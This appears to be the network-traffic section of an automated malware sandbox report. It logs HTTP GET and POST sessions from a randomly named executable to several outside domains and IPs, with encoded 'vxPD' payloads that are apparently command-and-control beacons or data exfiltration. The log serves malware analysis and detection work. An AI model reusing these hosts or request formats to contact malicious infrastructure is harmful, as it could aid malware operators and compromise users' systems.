                                                                    Data Ascii: vxPD=7OFv+ElOXEe7xAgMlnL/e3avWY3dsNnv7GtPDjcDC0gk4mQoei2zDOe+/tdFoj4T8Rv6yLFSC3BJUa2UXJjub5NCy2PuK9xSKm4zFaQTI0E4Z12K81Y+haVr1/m7BDPzvw/zVP0YQzPnQFv7fsmZoKlp1KNGBXNcNG5m40hkt36jIEvM2YHbA2ms7PuTCGvfIByyy6nfJMI8lDTQPXY2CJeHd6HBsbnvuta1G34IPmZTKXkeT8yqJBjRh8w6SVco78kVTubJ0lZNbx8f+gfzpRhkgg0AKOHF4znDsfuQ+KPg3lX6tIQNGocagFPOmLft7mDtt3luEmqUQd9Fvpalilk1Xhkrgb1taDio5538gYOI1tewjeASN7SmNVTjPSvKpOCIyhogDJ8vQudrv+uYsw9xvNCwmr0k2V1AqnuHRv70BayFMk3khwZ/gl4DlMoy4Ujnm5guxEcYnuy2VDjLYZrG2wjrz2Pk7kIPuG2F2vjGCtuKHJUUd4H/38O2UBn8AeDhqgOJ0QMbXzYY/CgDWnHXK49K3SHqDi3KmXwuH6SAqSFsWWNbAjGoM9QVbJ63ST1lGVtipmhNRoY6r68bqAaxMn/9SkfFmRa/jZr6ZJGyUd9o40rnMnO0lqb27+4ouetcUauYnRuUnqeLw9HBA0ebfF4Q7qbIWHd+nxZ/ZD+IE6Wbp+gRwVKXDW/JV6gGJUvFvfldegdJM7uxRZecSfvycKLQZBI2UPzuSx8JbFgf7TTZBqiO+Bcr8iIO+40NyPjrwkbL565ffTGiGOhTtVBzFZQ3hTW/q62sg+8IrPwUgdeCguNvTTblFEM0kQDhpgR0efmzA4RCgrovzEg5GRN1nBe9G8AaTDsaOBQvOT6u6/TU3Cgo8BIGjuQ2AKrFxj2u7JmPjoi/Ii0wWr1MsowHfnXYO6VtGGKUgj8aU6ZNuPJIwxRQwG1sRSuyMbsjAP0kDLZRmbEYprL7eJmon7B/NAZzEMWV/ZwCoaAr5Njpw/M [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.550010206.119.82.147801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:26.308629036 CET469OUTGET /jo6v/?vxPD=2MtP9xsvcXKXviIsu0vpU2PONZvfmv7hx3sLTV54B3JqqEM7biiUK4O8idRTqEg/3Cvc/KoIDU0zY+SEf5yzUNBsxxGwA99CFGRROpYSVV0FKk6l03kHnIpY1s/MIxOd0w==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.wdeb18.top
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.550011162.0.209.213801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:39.838634968 CET748OUTPOST /sfat/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.galaxyslot88rtp.lat
                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 71 66 34 78 58 6d 66 4c 69 78 4f 47 33 4e 62 47 66 32 2b 52 37 33 4b 72 32 77 42 44 36 5a 39 31 59 4e 66 52 48 6d 6b 34 6f 42 73 68 48 50 37 4c 4b 78 2b 6d 58 65 37 66 65 47 31 41 52 63 58 62 77 45 79 56 7a 74 59 6c 72 6e 38 70 67 45 41 67 4d 44 63 4d 68 7a 70 66 77 68 4a 78 67 4a 34 74 56 45 64 4a 53 4b 51 52 5a 54 6f 66 79 6c 58 45 71 45 45 67 54 36 33 6e 42 75 31 64 45 6d 65 55 43 49 76 4f 33 41 32 74 67 4e 6d 5a 57 35 33 2f 6d 64 37 45 59 37 65 55 2f 63 34 52 51 2f 67 37 4d 4a 6c 6c 44 73 64 72 4f 4e 4d 64 76 47 4a 43 73 30 62 67 5a 63 45 45 4d 50 31 70 45 44 36 6f 76 50 53 45 52 50 59 3d
                                                                    Data Ascii: vxPD=qf4xXmfLixOG3NbGf2+R73Kr2wBD6Z91YNfRHmk4oBshHP7LKx+mXe7feG1ARcXbwEyVztYlrn8pgEAgMDcMhzpfwhJxgJ4tVEdJSKQRZTofylXEqEEgT63nBu1dEmeUCIvO3A2tgNmZW53/md7EY7eU/c4RQ/g7MJllDsdrONMdvGJCs0bgZcEEMP1pED6ovPSERPY=
                                                                    Oct 30, 2024 04:58:40.511739969 CET1062INHTTP/1.1 301 Moved Permanently
                                                                    keep-alive: timeout=5, max=100
                                                                    content-type: text/html
                                                                    content-length: 795
                                                                    date: Wed, 30 Oct 2024 03:58:40 GMT
                                                                    server: LiteSpeed
                                                                    location: https://www.galaxyslot88rtp.lat/sfat/
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.550012162.0.209.213801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:42.393445969 CET768OUTPOST /sfat/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.galaxyslot88rtp.lat
                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 71 66 34 78 58 6d 66 4c 69 78 4f 47 6c 39 72 47 64 56 47 52 71 48 4b 6f 7a 77 42 44 7a 35 38 38 59 4e 54 52 48 6a 56 6a 6f 79 59 68 47 71 66 4c 4c 7a 57 6d 57 65 37 66 4c 32 31 4a 4d 4d 58 53 77 45 2b 64 7a 73 6b 6c 72 6b 41 70 67 47 59 67 4d 77 30 50 67 6a 70 4b 2f 42 4a 67 76 70 34 74 56 45 64 4a 53 4b 55 37 5a 54 67 66 79 31 6e 45 72 68 77 68 4e 4b 33 6f 43 75 31 64 41 6d 65 50 43 49 75 62 33 42 71 48 67 4c 71 5a 57 39 7a 2f 6d 4d 37 48 53 37 65 65 78 38 35 66 57 4e 51 7a 42 62 70 77 47 50 42 75 58 50 49 44 75 77 6b 6f 32 57 54 49 4b 38 6f 38 63 63 39 65 56 7a 62 42 31 73 43 30 50 59 50 64 61 63 7a 2f 41 31 77 4d 47 72 49 4d 65 54 52 57 54 62 55 37
                                                                    Data Ascii: vxPD=qf4xXmfLixOGl9rGdVGRqHKozwBDz588YNTRHjVjoyYhGqfLLzWmWe7fL21JMMXSwE+dzsklrkApgGYgMw0PgjpK/BJgvp4tVEdJSKU7ZTgfy1nErhwhNK3oCu1dAmePCIub3BqHgLqZW9z/mM7HS7eex85fWNQzBbpwGPBuXPIDuwko2WTIK8o8cc9eVzbB1sC0PYPdacz/A1wMGrIMeTRWTbU7
                                                                    Oct 30, 2024 04:58:43.058919907 CET1062INHTTP/1.1 301 Moved Permanently
                                                                    keep-alive: timeout=5, max=100
                                                                    content-type: text/html
                                                                    content-length: 795
                                                                    date: Wed, 30 Oct 2024 03:58:42 GMT
                                                                    server: LiteSpeed
                                                                    location: https://www.galaxyslot88rtp.lat/sfat/
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.550013162.0.209.213801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:44.936626911 CET1785OUTPOST /sfat/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.galaxyslot88rtp.lat
                                                                    Origin: http://www.galaxyslot88rtp.lat
                                                                    Referer: http://www.galaxyslot88rtp.lat/sfat/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 71 66 34 78 58 6d 66 4c 69 78 4f 47 6c 39 72 47 64 56 47 52 71 48 4b 6f 7a 77 42 44 7a 35 38 38 59 4e 54 52 48 6a 56 6a 6f 79 41 68 48 59 58 4c 45 79 57 6d 51 75 37 66 58 6d 31 4d 4d 4d 57 41 77 45 32 5a 7a 73 70 53 72 68 45 70 6a 6e 34 67 45 68 30 50 75 6a 70 4b 6e 78 49 6e 67 4a 34 43 56 43 39 4e 53 4b 45 37 5a 54 67 66 79 32 2f 45 69 55 45 68 50 4b 33 6e 42 75 31 61 45 6d 66 42 43 49 6e 73 33 42 65 39 6a 37 4b 5a 59 39 6a 2f 71 65 54 48 49 37 65 51 32 38 34 43 57 4e 64 74 42 62 31 38 47 4d 63 42 58 4e 59 44 75 45 31 76 76 47 66 50 51 75 67 2b 4f 74 63 35 4b 45 66 79 31 63 79 62 43 75 66 44 52 6f 66 68 47 41 73 2b 46 34 78 6f 42 6c 78 46 61 73 39 6a 71 61 4e 47 6a 58 68 31 73 5a 78 74 45 6e 37 75 68 71 35 4b 70 6a 7a 4b 55 45 4f 4e 48 6a 4a 47 79 6d 2f 31 6d 6b 59 30 2f 48 56 66 68 41 58 4d 78 47 52 58 53 65 59 64 6b 6a 31 56 55 4b 31 51 39 77 6d 63 6e 6b 54 32 46 4e 35 58 33 36 59 75 6c 33 72 56 76 38 7a 4a 69 43 75 72 57 64 57 45 79 45 75 48 6d 63 68 63 50 57 63 6d 45 56 43 5a 54 [TRUNCATED]
                                                                    Data Ascii: vxPD=qf4xXmfLixOGl9rGdVGRqHKozwBDz588YNTRHjVjoyAhHYXLEyWmQu7fXm1MMMWAwE2ZzspSrhEpjn4gEh0PujpKnxIngJ4CVC9NSKE7ZTgfy2/EiUEhPK3nBu1aEmfBCIns3Be9j7KZY9j/qeTHI7eQ284CWNdtBb18GMcBXNYDuE1vvGfPQug+Otc5KEfy1cybCufDRofhGAs+F4xoBlxFas9jqaNGjXh1sZxtEn7uhq5KpjzKUEONHjJGym/1mkY0/HVfhAXMxGRXSeYdkj1VUK1Q9wmcnkT2FN5X36Yul3rVv8zJiCurWdWEyEuHmchcPWcmEVCZTqkZoQf/BDP1O49sxpgYWxi5wMQrk8pWCl90KBCLhODPiC7ROJ16T0PYF6OCMZ7Qm46iAELi7mBEurlvt59j/5QhhmAQKId7NY4HYQZo/d2GuJOJGiz1pGMvyZ4PBAHZzmz+qdCWdwaQdErLRv8YeO/VIuPiJCIsqtBX8zNqQyZYgfHArzyjnPZCq0y69EbACx/gDUVdiDyce5/WIqTvt327shxKMsD1p01PowBz3k6mIwRPBjJC9i9FHmlLNZ47/NgDDfN3miFtx4JiRtzQ+n32t6Lqq2oYSmcns+vHiZ749ZzGMbS6bQyBaWnjcUngfKzAidvRmFUJ6jOfp+DbbFsnbq/C9/vBPUBtiM9HmT2usejQUkXppwVyAznaAuZprmKtjS2J8QXhc+2Sp8V1D9mhH6vnSAVuzn+71Myi7LglgElq+u2Bjo05d5JMijlGdQ2K2ideQWX8C+RP6qa8c2WfOeJY0yxjgIJwDnFzc1xMkseMe9yvjo3UXxBcYfjWiYnF0+q5NSicDJr3ir7HE349xqBcoyUWJ1f1jFmUHYHSTVGhRxBpgDY571OtmH0HI9ADKQOzml+xUDBs4xA/Nu18UEBYgPSzgrSKF4lB5QNGnFLGG2cmdQzATZEJtHgXynfejrUCjkqw3PCOpUdq9tDPR5e4A/9Y2A8 [TRUNCATED]
                                                                    Oct 30, 2024 04:58:45.593148947 CET1062INHTTP/1.1 301 Moved Permanently
                                                                    keep-alive: timeout=5, max=100
                                                                    content-type: text/html
                                                                    content-length: 795
                                                                    date: Wed, 30 Oct 2024 03:58:45 GMT
                                                                    server: LiteSpeed
                                                                    location: https://www.galaxyslot88rtp.lat/sfat/
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.550014162.0.209.213801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:47.476031065 CET478OUTGET /sfat/?7JH=bvSPlHnHQ4A&vxPD=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.galaxyslot88rtp.lat
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:58:48.152520895 CET1216INHTTP/1.1 301 Moved Permanently
                                                                    keep-alive: timeout=5, max=100
                                                                    content-type: text/html
                                                                    content-length: 795
                                                                    date: Wed, 30 Oct 2024 03:58:48 GMT
                                                                    server: LiteSpeed
                                                                    location: https://www.galaxyslot88rtp.lat/sfat/?7JH=bvSPlHnHQ4A&vxPD=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw==
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.5500153.33.130.190801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:53.440233946 CET721OUTPOST /zlyl/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.dto20.shop
                                                                    Origin: http://www.dto20.shop
                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 44 6e 54 65 55 6e 38 62 51 4f 30 66 38 4b 37 51 35 63 65 37 47 50 4e 43 72 7a 47 63 5a 36 58 37 66 50 57 47 32 35 4e 45 43 58 39 6c 57 52 50 39 53 66 2f 4a 33 69 61 65 53 77 6a 4a 4e 70 32 63 45 61 4f 46 46 74 72 64 6b 38 31 73 47 69 54 38 76 76 76 50 52 59 65 55 64 33 75 70 69 6c 72 78 38 4b 69 75 78 68 4f 31 71 31 38 6b 66 46 4d 63 6e 59 59 53 6e 7a 51 79 50 52 64 34 51 77 48 79 65 75 56 77 41 43 72 79 4b 46 33 55 37 74 4a 74 77 51 2b 4d 4d 69 41 4f 59 53 34 52 71 62 44 6c 34 42 6c 59 57 61 46 30 63 7a 63 69 42 51 2f 6a 43 78 34 56 57 51 39 39 61 54 34 56 74 35 51 43 31 5a 51 44 79 44 45 3d
                                                                    Data Ascii: vxPD=DnTeUn8bQO0f8K7Q5ce7GPNCrzGcZ6X7fPWG25NECX9lWRP9Sf/J3iaeSwjJNp2cEaOFFtrdk81sGiT8vvvPRYeUd3upilrx8KiuxhO1q18kfFMcnYYSnzQyPRd4QwHyeuVwACryKF3U7tJtwQ+MMiAOYS4RqbDl4BlYWaF0czciBQ/jCx4VWQ99aT4Vt5QC1ZQDyDE=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.5500163.33.130.190801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:55.987848043 CET741OUTPOST /zlyl/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.dto20.shop
                                                                    Origin: http://www.dto20.shop
                                                                    Referer: http://www.dto20.shop/zlyl/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 44 6e 54 65 55 6e 38 62 51 4f 30 66 74 61 4c 51 31 62 71 37 48 76 4e 64 75 7a 47 63 51 61 58 33 66 4f 71 47 32 35 6c 55 43 6b 4a 6c 59 56 48 39 54 62 6a 4a 79 69 61 65 61 51 6a 4d 43 4a 32 58 45 61 79 6e 46 73 58 64 6b 38 78 73 47 69 44 38 76 63 33 49 52 49 65 53 51 58 75 33 6d 6c 72 78 38 4b 69 75 78 6c 75 50 71 78 6f 6b 63 31 38 63 6c 38 45 4e 72 54 51 78 66 42 64 34 55 77 48 32 65 75 56 6f 41 44 32 66 4b 48 50 55 37 70 42 74 78 42 2b 44 62 53 42 46 48 69 35 61 75 72 32 67 69 41 35 4d 4b 62 52 33 44 77 67 6c 4a 47 53 4a 59 54 77 39 46 77 52 46 4b 41 77 69 38 4a 78 72 76 36 41 7a 73 55 53 58 4f 70 4b 34 4c 62 46 74 58 4d 51 37 73 6b 33 50 6f 36 79 66
                                                                    Data Ascii: vxPD=DnTeUn8bQO0ftaLQ1bq7HvNduzGcQaX3fOqG25lUCkJlYVH9TbjJyiaeaQjMCJ2XEaynFsXdk8xsGiD8vc3IRIeSQXu3mlrx8KiuxluPqxokc18cl8ENrTQxfBd4UwH2euVoAD2fKHPU7pBtxB+DbSBFHi5aur2giA5MKbR3DwglJGSJYTw9FwRFKAwi8Jxrv6AzsUSXOpK4LbFtXMQ7sk3Po6yf


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
